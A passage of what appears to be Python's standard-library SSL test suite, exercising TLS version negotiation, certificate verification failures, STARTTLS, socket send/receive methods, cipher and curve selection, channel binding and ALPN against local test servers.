client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(
ssl.SSLError,
'alert unknown ca|EOF occurred'
):
                # TLS 1.3 performs the client cert exchange after the handshake
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
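    # test_ssl_cert_verify_error: the client context has no CA certificates
    # loaded, so the handshake fails and the SSLCertVerificationError exposes
    # verify_code, verify_message and a "certificate verify failed" repr.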
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
                        self.fail(
                            "While sending with <<{name:s}>> bad data "
                            "<<{outdata!r}>> ({nout:d}) received; "
                            "expected <<{indata!r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
                    self.fail(
                        "Method <<{name:s}>> failed with unexpected "
                        "exception message: {exp!s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
                        self.fail(
                            "While receiving with <<{name:s}>> bad data "
                            "<<{outdata!r}>> ({nout:d}) received; "
                            "expected <<{indata!r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
                    self.fail(
                        "Method <<{name:s}>> failed with unexpected "
                        "exception message: {exp!s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
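    # test_recv_zero: recv(0)/read(0) return b"" without consuming buffered
    # data, and on a non-blocking socket recv(0)/recv_into(bytearray()) do not
    # raise even when no data is pending.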
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
        # Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # The client waits until the server is set up, then connects.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
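    # The next two tests check that getpeercert() and do_handshake() on a
    # wrapped but unconnected socket raise OSError with errno ENOTCONN.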
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
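    # test_tls1_3: with the client's minimum version pinned to TLS 1.3, the
    # negotiated cipher must be one of the TLS 1.3 AEAD suites and version()
    # must report 'TLSv1.3'.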
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
                # and compare it with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
                # check that it is really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
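    # test_compression: records whatever compression the handshake negotiated;
    # modern OpenSSL builds typically report None since TLS compression is
    # disabled by default.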
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
            self.fail("Non-DH cipher: " + cipher)
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
